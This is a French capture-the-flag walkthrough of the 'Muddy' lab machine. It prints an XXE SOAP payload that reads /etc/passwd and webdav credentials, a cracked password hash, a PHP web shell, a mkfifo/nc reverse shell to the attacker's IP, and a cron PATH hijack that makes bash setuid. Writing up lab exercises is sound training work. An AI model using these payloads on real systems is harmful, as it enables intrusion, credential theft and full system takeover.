Muddy

webdav XEE crontab

Nom machine : Muddy
Difficulté : Facile (mais pas si simple)
OS : Linux

Enumération

NMAP

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-15 14:09 EDT
Nmap scan report for 192.168.170.161
Host is up (0.044s latency).
Not shown: 65528 closed tcp ports (conn-refused)
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)
|   256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)
|_  256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)
25/tcp   open  smtp       Exim smtpd
| smtp-commands: muddy Hello nmap.scanme.org [192.168.45.206], SIZE 52428800, 8BITMIME, PIPELINING, CHUNKING, PRDR, HELP
|_ Commands supported: AUTH HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
80/tcp   open  http       Apache httpd 2.4.38 ((Debian))
|_http-title: Did not follow redirect to http://muddy.ugc/
|_http-server-header: Apache/2.4.38 (Debian)
111/tcp  open  rpcbind    2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|_  100000  3,4          111/udp6  rpcbind
808/tcp  open  tcpwrapped
908/tcp  open  tcpwrapped
8888/tcp open  http       WSGIServer 0.1 (Python 2.7.16)
|_http-server-header: WSGIServer/0.1 Python/2.7.16
|_http-title: Ladon Service Catalog
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

SMTP (25) : Exim smtpd

┌──(kali㉿kali)-[~]
└─$ nmap --script smtp-enum-users 192.168.170.161 -p 25     
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-15 14:18 EDT
Nmap scan report for muddy.ugc (192.168.170.161)
Host is up (0.037s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT     STATE SERVICE
25/tcp   open  smtp
| smtp-enum-users: 
|_  Couldn't find any accounts

Je n'ai pas cherché plus loin.

HTTP (80) : apache 2.4.38

En allant sur le navigateur et tappant l'adresse ip, nous n'avons pas accès à la page. En haut se trouve le nom de domaine que nous allons ajouter à notre fichier host.

┌──(kali㉿kali)-[~]
└─$ cat nano /etc/hosts
cat: nano: No such file or directory
127.0.0.1	localhost
127.0.1.1	kali
192.168.170.161 muddy.ugc

Après avoir rafraîchit la page, nous y avons accès.

┌──(kali㉿kali)-[~]
└─$ whatweb http://muddy.ugc/      
http://muddy.ugc/ [200 OK] Apache[2.4.38], Bootstrap[5.7], Country[RESERVED][ZZ], Email[mail@mail.com], HTML5, HTTPServer[Debian Linux][Apache/2.4.38 (Debian)], IP[192.168.170.161], JQuery[3.5.1], MetaGenerator[WordPress 5.7], Script[text/javascript], Title[Muddy | Found some mud? Call us! &#8211; A muddy WordPress!], UncommonHeaders[link], WordPress[5.7]

Nous faisons face à un site wordpress.

┌──(kali㉿kali)-[~]
└─$ wpscan --url http://muddy.ugc/ -e
{...}
[i] No Users Found.
{...}

Gobuster

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://muddy.ugc -w //usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php,html,txt,pdf,js
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://muddy.ugc
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                //usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              pdf,js,php,html,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
{...}
/wp-trackback.php     (Status: 200) [Size: 135]
/wp-admin             (Status: 301) [Size: 309] [--> http://muddy.ugc/wp-admin/]
/xmlrpc.php           (Status: 405) [Size: 42]
/webdav               (Status: 401) [Size: 456]
{...}

Le répertoire webdav semble intéressant.

Rpcbind (111)

┌──(kali㉿kali)-[~]
└─$ rpcinfo 192.168.170.161
   program version netid     address                service    owner
    100000    4    tcp6      ::.0.111               portmapper superuser
    100000    3    tcp6      ::.0.111               portmapper superuser
    100000    4    udp6      ::.0.111               portmapper superuser
    100000    3    udp6      ::.0.111               portmapper superuser
    100000    4    tcp       0.0.0.0.0.111          portmapper superuser
    100000    3    tcp       0.0.0.0.0.111          portmapper superuser
    100000    2    tcp       0.0.0.0.0.111          portmapper superuser
    100000    4    udp       0.0.0.0.0.111          portmapper superuser
    100000    3    udp       0.0.0.0.0.111          portmapper superuser
    100000    2    udp       0.0.0.0.0.111          portmapper superuser
    100000    4    local     /run/rpcbind.sock      portmapper superuser
    100000    3    local     /run/rpcbind.sock      portmapper superuser

Rien d'intéressant.

HTTP (8888) : WSGIServer 0.1 (Python 2.7.16)

On obtient cette page.

"Powered by Ladon for Python".

Nous allons chercher un exploit pour Ladon.

Accès initial

Exploit

Ladon Framework for Python 0.9.40 - XML External Entity ExpansionExploit Database

Nous allons modifier le payload en mettant l'url désirée, le fichier voulu et remplaçant sayhello par checkout.

┌──(kali㉿kali)-[~]
└─$ curl -s -X $'POST' \
-H $'Content-Type: text/xml;charset=UTF-8' \
-H $'SOAPAction: \"http://muddy.ugc:8888/muddy/soap11/checkout\"' \
--data-binary $'<?xml version="1.0"?>
<!DOCTYPE uid
[<!ENTITY passwd SYSTEM "file:///etc/passwd">
]>
<soapenv:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"
xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"
xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"
xmlns:urn=\"urn:HelloService\"><soapenv:Header/>
<soapenv:Body>
<urn:checkout soapenv:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">
<uid xsi:type=\"xsd:string\">&passwd;</uid>
</urn:checkout>
</soapenv:Body>
</soapenv:Envelope>' \
'http://muddy.ugc:8888/muddy/soap11/checkout' | xmllint --format -

Le résultat :

<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns="urn:muddy" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <SOAP-ENV:Body SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
    <ns:checkoutResponse>
      <result>Serial number: root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin/nologinsys:x:3:3:sys:/dev:/usr/sbin/nologinsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/usr/sbin/nologinman:x:6:12:man:/var/cache/man:/usr/sbin/nologinlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologinmail:x:8:8:mail:/var/mail:/usr/sbin/nologinnews:x:9:9:news:/var/spool/news:/usr/sbin/nologinuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologinproxy:x:13:13:proxy:/bin:/usr/sbin/nologinwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologinbackup:x:34:34:backup:/var/backups:/usr/sbin/nologinlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologinirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologingnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologinnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin_apt:x:100:65534::/nonexistent:/usr/sbin/nologinsystemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologinsystemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologinsystemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologinmessagebus:x:104:110::/nonexistent:/usr/sbin/nologinsshd:x:105:65534::/run/sshd:/usr/sbin/nologinsystemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologinmysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/falseian:x:1000:1000::/home/ian:/bin/shDebian-exim:x:107:114::/var/spool/exim4:/usr/sbin/nologin_rpc:x:108:65534::/run/rpcbind:/usr/sbin/nologinstatd:x:109:65534::/var/lib/nfs:/usr/sbin/nologin</result>
    </ns:checkoutResponse>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>

Nous avons trouvé précédemment un fichier webdav. Après une recherche sur internet, nous avons trouvé que le fichier contenant les identifiants se trouvent à /var/www/dav/passwd.dav.

Après plusieurs changements :

┌──(kali㉿kali)-[~]
└─$ curl -s -X $'POST' \
-H $'Content-Type: text/xml;charset=UTF-8' \
-H $'SOAPAction: \"http://muddy.ugc:8888/muddy/soap11/checkout\"' \
--data-binary $'<?xml version="1.0"?>
<!DOCTYPE uid
[<!ENTITY passwd SYSTEM "file:/var/www/html/webdav/passwd.dav"> 
]>
<soapenv:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"
xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"
xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"
xmlns:urn=\"urn:HelloService\"><soapenv:Header/>
<soapenv:Body>
<urn:checkout soapenv:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">
<uid xsi:type=\"xsd:string\">&passwd;</uid>
</urn:checkout>
</soapenv:Body>
</soapenv:Envelope>' \
'http://muddy.ugc:8888/muddy/soap11/checkout' | xmllint --format -
<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns="urn:muddy" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <SOAP-ENV:Body SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
    <ns:checkoutResponse>
      <result>Serial number: administrant:$apr1$GUG1OnCu$uiSLaAQojCm14lPMwISDi0</result>
    </ns:checkoutResponse>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>

Nous allons cracker le hash (md5crypt)

┌──(kali㉿kali)-[~]
└─$ cat hash.txt                                             
$apr1$GUG1OnCu$uiSLaAQojCm14lPMwISDi0
┌──(kali㉿kali)-[~]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
{...}
sleepless        (?)
{...}

Nous avons un nom d'utilisateur et un mot de passe, nous allons les utiliser dans le repertoire webdav. Nous allons uploader un shell.

┌──(kali㉿kali)-[~]
└─$ cat shell.php  
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>
                                                             
┌──(kali㉿kali)-[~]
└─$ curl -u administrant:sleepless -T shell.php http://muddy.ugc/webdav/

Nous allons lancer un listener et exécuter le payload : rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.45.206 1234 >/tmp/f dans la barre du shell (ou url)

┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1234                                            
listening on [any] 1234 ...
connect to [192.168.45.206] from (UNKNOWN) [192.168.170.161] 41892
bash: cannot set terminal process group (587): Inappropriate ioctl for device
bash: no job control in this shell
www-data@muddy:/var/www/html/webdav$ whoami
whoami
www-data

Pour le flag :

www-data@muddy:/var/www/html/webdav$ find / -name local.txt 2>/dev/null

Elévation des privilèges

Crontab

www-data@muddy:/var/www/html/webdav$ cat /etc/crontab
{...}
SHELL=/bin/sh
PATH=/dev/shm:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
{...}
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*  *    * * *   root    netstat -tlpn > /root/status && service apache2 status >> /root/status && service mysql status >> /root/status

La dernière ligne nous intéresse, ainsi que le PATH. En effet, nous avons les droits en écriture de /dev/shm.

Ainsi :

www-data@muddy:/dev/shm$ echo "chmod +s /bin/bash" > netstat 
www-data@muddy:/dev/shm$ chmod 777 netstat

Après un petit temps

www-data@muddy:/dev/shm$ bash -p
whoami
root

Nous sommes root !

PrécédentKevin SuivantNappa

Mis à jour il y a 1 an

hashtagEnumération

hashtagNMAP

hashtagSMTP (25) : Exim smtpd

hashtagHTTP (80) : apache 2.4.38

hashtagGobuster

hashtagRpcbind (111)

hashtagHTTP (8888) : WSGIServer 0.1 (Python 2.7.16)

hashtagAccès initial

hashtagExploit

hashtagElévation des privilèges

hashtagCrontab